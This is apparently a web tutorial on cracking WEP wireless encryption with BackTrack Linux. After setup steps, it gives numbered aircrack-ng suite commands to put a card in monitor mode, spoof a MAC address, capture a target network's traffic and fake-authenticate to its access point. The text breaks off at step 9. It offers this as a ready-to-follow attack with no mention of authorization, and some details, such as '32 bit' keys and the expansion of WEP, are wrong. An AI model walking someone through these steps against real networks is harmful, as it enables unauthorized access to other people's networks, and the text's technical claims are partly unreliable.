(adsbygoogle = window.adsbygoogle || []).push({});
Cracking Wireless Equivalence Policy is really not to hard to break. The smaller they key the easier it is to crack WEP Keys come in 3 different styles 32 bit,64 bit,and 128 bit Keys. The higher the key the longer it will take for you to crack. So before we do any actual cracking you need to have all of the pre requisites those are first of all a copy of Backtrack Linux ill show you how to get that later, next we need a Wireless Card that is capable of being used in Backtrack Linux, and finally we need a laptop or computer to run it off of.
How to Get Backtrack
1. First of all you need to download a copy of the ISO file You must login or register to view this content..
GET BACKTRACK 3!! ITS AT THE BOTTOM OF PAGE
2. Than if you are on Windows 7 all you need to do is put in a CD and click burn to disc. If your not just search for a free ISO Burning tool such as Power ISO.
3. Now Just put the CD in your computer and Reboot. Your computer should boot off the Disc and load up backtrack.
4. It might drop you to a CMD line all you have to do is to type “startx” without the quotes.
How to Crack WEP Keys on Backtrack
Allright now you should be in Backtrack the desktop should be all loaded and you should be ready to start cracking those WEP Keys.
1. First you must click on the Terminal icon in the bottom toolbar it looks like a black TV.
2. Now you must type in airmon-ng the command will display a card name which you will need to remember and substitute for the “eth1″.
3. Now type airmon-ng stop “eth1″.
4.Now type ifconfig “eth1″ down
5.Now type macchanger --mac 00:11:22:33:44:55 “eth1″
6.Now type airmon-ng start “eth1″
7.Now type airodump-ng “eth1″
*You need to note the Channel, The BSSID, and the ESSID to crack.*
8.Now type airodump-ng -c “whatever channel its on” -w “pie1” --BSSID “whateverbssid” “eth1″
*Make sure that you leave this window open so run a new Terminal.*
9.aireplay-ng -1 0 -a “bssid” -h 00:11:22:33:44:55 “eth1″